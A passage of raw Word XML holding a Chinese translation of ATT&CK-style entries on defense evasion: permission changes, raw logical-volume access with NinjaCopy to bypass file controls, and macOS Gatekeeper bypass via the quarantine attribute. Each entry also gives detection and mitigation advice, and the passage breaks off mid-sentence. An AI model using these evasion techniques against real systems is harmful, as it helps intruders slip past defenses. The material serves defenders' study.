          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:t>缓解</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A4EF07B" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这种类型的攻击技术基于系统功能的滥用，无法通过预防性控制来轻松缓解其造成的影响。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="016C7933" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:t>检测</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39725D30" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>监控和调查试图修改</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>DACL</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和文件所有权的行为，例如在</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>W</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>indows</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>icacls</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>takeown</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>attrib</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:hyperlink r:id="rId105" w:history="1">
        <w:r w:rsidRPr="00AF6363">
          <w:t>PowerShell</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00AF6363">
        <w:t>Set-Acl</w:t>
      </w:r>
      <w:r w:rsidRPr="00AF6363">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>mac</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>OS</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>L</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>inux</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>chmod/chown</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。其中许多是系统内置</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>实用程序，可能会导致高误报率。因此请与基线知识进行比较来</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>看看系统通常是如何使用的</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，并在可能的情况下将修改事件与其他恶意活动行为关联。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="736DD519" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="af4"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="4F7CAC"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>考虑对包含关键二进制</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>配置文件的文件夹启用文件权限更改审核。修改</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>DACL</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>时使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>安全日志事件（事件</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>4670</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57952381" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00941A4A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件系统逻辑偏移</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3"/>
      </w:tblGrid>
      <w:tr w:rsidR="000F2665" w14:paraId="0EA2945D" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9623" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0F7FFCC9" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00D12CC9" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00D12CC9">
              <w:t>编号：</w:t>
            </w:r>
            <w:r w:rsidRPr="00D12CC9">
              <w:t xml:space="preserve"> T1006</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3C11543B" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00D12CC9" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>技术</w:t>
            </w:r>
            <w:r w:rsidRPr="00D12CC9">
              <w:t>：</w:t>
            </w:r>
            <w:r w:rsidRPr="00D12CC9">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>防御逃逸</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7FD93186" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00D12CC9" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00D12CC9">
              <w:t>平台：</w:t>
            </w:r>
            <w:r w:rsidRPr="00D12CC9">
              <w:t xml:space="preserve"> Windows</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4A4DD691" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00D12CC9" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00D12CC9">
              <w:t>所需权限：</w:t>
            </w:r>
            <w:r w:rsidRPr="00D12CC9">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00D12CC9">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>管理员</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="272D604E" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00D12CC9" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00D12CC9">
              <w:t>数据源：</w:t>
            </w:r>
            <w:r w:rsidRPr="00D12CC9">
              <w:t xml:space="preserve"> API</w:t>
            </w:r>
            <w:r w:rsidRPr="00D12CC9">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>监控</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="12D44BD5" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00D12CC9" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>绕过的防御</w:t>
            </w:r>
            <w:r w:rsidRPr="00D12CC9">
              <w:t>:</w:t>
            </w:r>
            <w:r w:rsidRPr="00D12CC9">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>文件监测</w:t>
            </w:r>
            <w:r w:rsidRPr="00D12CC9">
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r w:rsidRPr="00D12CC9">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>文件系统访问控制</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="756DE665" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00D12CC9" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00D12CC9">
              <w:t>版本：</w:t>
            </w:r>
            <w:r w:rsidRPr="00D12CC9">
              <w:t xml:space="preserve"> 1.0</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="142C9D7E" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="11"/>
              <w:ind w:leftChars="0" w:left="0"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0E225FFF" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:color w:val="39434C"/>
          <w:kern w:val="2"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="57C9738E" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00471C09" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00471C09">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Windows </w:t>
      </w:r>
      <w:r w:rsidRPr="00471C09">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>允许程序直接访问逻辑卷。具有直接访问权限的程序可以通过分析文件系统数据结构直接从驱动器读取和写入文件。此技术绕过</w:t>
      </w:r>
      <w:r w:rsidRPr="00471C09">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> Windows </w:t>
      </w:r>
      <w:r w:rsidRPr="00471C09">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件访问控件以及文件系统监视工具</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6662F815" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="afd"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>某些</w:t>
      </w:r>
      <w:r w:rsidRPr="00471C09">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>程序（如</w:t>
      </w:r>
      <w:r w:rsidRPr="00471C09">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t xml:space="preserve"> NinjaCopy</w:t>
      </w:r>
      <w:r w:rsidRPr="00471C09">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>有能力在</w:t>
      </w:r>
      <w:r w:rsidRPr="00471C09">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t xml:space="preserve">PowerShell </w:t>
      </w:r>
      <w:r w:rsidRPr="00471C09">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>中执行这些操作</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DD4343D" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>缓解</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50E4F69B" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00471C09">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这种类型的攻击技术无法通过预防性控制</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>得到</w:t>
      </w:r>
      <w:r w:rsidRPr="00471C09">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>缓解，因为它</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是</w:t>
      </w:r>
      <w:r w:rsidRPr="00471C09">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>基于系统功能的滥用。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AD56841" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r>
        <w:t>检测</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="680D7E8C" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00471C09" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00471C09">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>监视器句柄在进程制作的驱动器卷上打开，以确定它们何时可以直接访问逻辑驱动器</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68BCA14A" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00471C09">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>监视进程和命令行参数，以</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>监控</w:t>
      </w:r>
      <w:r w:rsidRPr="00471C09">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>从逻辑驱动器复制文件并逃避常见文件系统保护</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidRPr="00471C09">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>操作。由于此技术也可通过</w:t>
      </w:r>
      <w:r w:rsidRPr="00471C09">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> PowerShell </w:t>
      </w:r>
      <w:r w:rsidRPr="00471C09">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用，因此建议对</w:t>
      </w:r>
      <w:r w:rsidRPr="00471C09">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> PowerShell </w:t>
      </w:r>
      <w:r w:rsidRPr="00471C09">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>脚本进行其他日志记录。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27848B52" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="22E190CC" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>关守绕过</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="1560" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8176"/>
      </w:tblGrid>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00671A0D" w14:paraId="288F6FFE" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8176" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="427CAAF1" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>编号：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>T1144</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="43B6A84E" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>技术：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>防御逃逸</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5163A07C" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>平台：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>macOS</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7610A151" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>所需权限：用户，管理员</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="77098C52" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>绕过的防御：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>应用</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>白名单，防病毒</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="44591535" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>版本：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>1.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="21C81FAB" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:left="1560"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1573A609" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>MacOS</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>OS</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>X</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中，应用或程序从</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Internet</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>下载时，会在</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>com.apple.quarantine</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件中设置一个特殊属性。执行时，苹果公司的关守防御程序会</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>读取</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这个属性，并会提示用户允许或拒绝执行。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10B5629E" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>应用从</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>USB</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>盘、光盘、外接硬盘，甚至本地网络共享驱动器加载到系统上时，不会设置此标志。此外，其他实用程序或事件（如路过式下载）也不必设置此标志。这样</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>就</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>完全绕过了内置关守检查。是否</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>有隔离标志</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可以使用针对</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>com.apple.quarantine</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>xattr</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>命令</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>xattr /path/to/MyApp.app</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t> </w:t>
      </w:r>
